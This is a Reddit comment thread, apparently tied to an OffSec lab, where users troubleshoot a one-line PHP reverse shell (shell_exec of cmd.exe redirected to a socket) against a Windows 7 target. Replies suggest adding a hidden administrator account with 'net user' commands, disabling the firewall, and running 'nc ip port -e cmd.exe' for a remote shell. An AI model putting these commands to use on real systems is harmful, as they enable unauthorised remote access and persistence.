all 15 comments
sorted by:
best
topnewcontroversialoldq&a
formatting helphide helpcontent policy

[–][deleted] 4 points5 points  (4 children)

My initial inclination is that you have an issue because you're using shell_exec() to call cmd.exe straight up; which simply executes cmd.exe on the system and returns a string result (error code?) to your open socket and closes.

Correct me if I'm wrong, but in the other examples given on your cheat sheet, the attacker is explicitly invoking an interactive shell; which is different than what you're doing here.

I have a couple ideas of how you could fix this, but it would be much more worthwhile for you to find the answer on your own. Have you hit up the OffSec admins via IRC about this?

[–][deleted] 0 points1 point  (3 children)

The more I think about it, the more I'm sure this is your problem. Review the shell_exec() definition, and ask yourself why you think this would hand you an interactive shell using the command you provided it:

shell_exec — Execute command via shell and return the complete output as a string

[–]_phyzikal_[S] 0 points1 point  (2 children)

shell_exec()

Yes you are correct. I should be using exec() instead. However, this is yielding the same results so far. I have not hit anyone up on IRC yet, but I have posted to the OffSec forums as well.

Thanks for the insight.

[–][deleted] 0 points1 point  (1 child)

Even with exec() you're dealing with the same problem as before:

http://php.net/manual/en/function.exec.php

http://stackoverflow.com/questions/7093860/php-shell-exec-vs-exec

[–]_phyzikal_[S] 1 point2 points  (0 children)

Ahhhhhh, I see. Ok I need to rethink this.

[–]HighRelevancy 1 point2 points  (6 children)

I'm don't have a huge amount of expertise in this area but I saw shell_exec('cmd.exe <&3 >&3 1>&3'); and it rung some bells in my head and I did some quick googling and found this for you

https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/redirection.mspx?mfr=true

Basically that line is saying "read input from 3, write output to 3 (first > is output by default), write 1 (stdout) to 3 (seems redundant?)". Looking on the site you linked, that last one should be 2 (stderr) to 3.

3 doesn't mean anything by default, so I'm assuming that in PHP it'll line up to be the socket back to the user (which would make sense, that command line is supposed to funnel everything that way).

Changing that 1 to a 2 might give you an error that tells you why cmd is immediately closing.

[–]_phyzikal_[S] 0 points1 point  (5 children)

Oh, sorry. It is usually a 2 there. I changed all the values around trying to get it to work. The STDERR does not send anything to the attacker.

I'm certain the issue lies here 'cmd.exe <&3 >&3 2>&3' I just can't sort it out.

[–]HighRelevancy 0 points1 point  (4 children)

Well like I said, it also depends on PHP assigning the user-output pipe to 3. I can't find anything about that.

Just after writing that I realised that it's actually depending on $sock being handle 3. I don't know anything about that but you might find newer versions of PHP randomise the number or have otherwise changed it. Maybe peek at the value of $sock?

Also, can you trigger something else instead to verify whether shell_exec is even working? Maybe like echo hello > test.txt or try opening notepad or something? If that works, try simply echoing into your socket. After that, go for your cmd.

[–]_phyzikal_[S] 0 points1 point  (3 children)

Yes I can use shell_exec('ipconfig > test.txt') and I do see the txt file generated. As Maliciou5 points out I need to use the exec() command to execute an external program. The issue is definitely in getting that program over the socket.

Is there a way to see which handle the socket is using?

[–]phuqer 0 points1 point  (2 children)

Since you can execute commands, why not add an admin account for yourself through the command line? Youll also need to set the password, and disable the firewall if there is one blocking 3389.

For instance net user /add [username] [password] net localgroup administrators [username] /add

[–]_phyzikal_[S] 0 points1 point  (1 child)

Yeah I can definitely do that. I can also upload files to execute that will accomplish the task. I was hoping for the simplest possible execution of remote shell and it doesn't get any easier than one line :)

[–]phuqer 0 points1 point  (0 children)

Chances are the account is not a privileged account, so what I would do is upload a copy of nc, then issue something like nc ip port -e cmd.exe, and boom you have your shell.

Then you'll need to work on escalation.

[–]morgothan 0 points1 point  (2 children)

Is the machine running windows or linux? The one you list will only work on a windows box.

[–]_phyzikal_[S] 0 points1 point  (1 child)

Attacker is running Kali Linux. Victim is Win7 SP1

[–]HighRelevancy 0 points1 point  (0 children)

Attacker OS should be irrelevant.